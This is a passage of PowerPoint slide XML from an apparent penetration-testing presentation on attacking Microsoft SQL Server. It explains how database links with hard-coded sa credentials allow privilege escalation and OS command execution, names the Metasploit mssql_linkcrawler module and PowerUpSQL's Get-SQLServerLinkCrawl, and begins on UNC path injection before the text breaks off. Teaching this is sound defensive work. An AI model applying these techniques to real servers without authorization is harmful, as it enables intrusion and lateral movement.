              <a:t>Crawling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Links</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E617196B-1E9B-924C-84DB-40E47761D699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>essentially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>between</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> server A to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>communicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> server B and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>pull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> server B, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to run as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>who’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in, but more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>often</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> use hard-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>coded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> hard-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>coded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>due</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>fact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>members</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> public role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>right</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> data on server B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> server A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>OpenQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a database link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>being</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>operating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>larger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>automating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>crawling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>leveraging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql_linkcrawler</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Get-SQLServerLinkCrawl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>PowerUPSQL</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2003576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072E-ED7D-EC48-A037-6365961A7745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Indirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> - UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C1B071-71F3-AE4C-90BD-C1977CA670D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600202"/>
            <a:ext cx="10972800" cy="3268959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> \\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> majority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accepting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
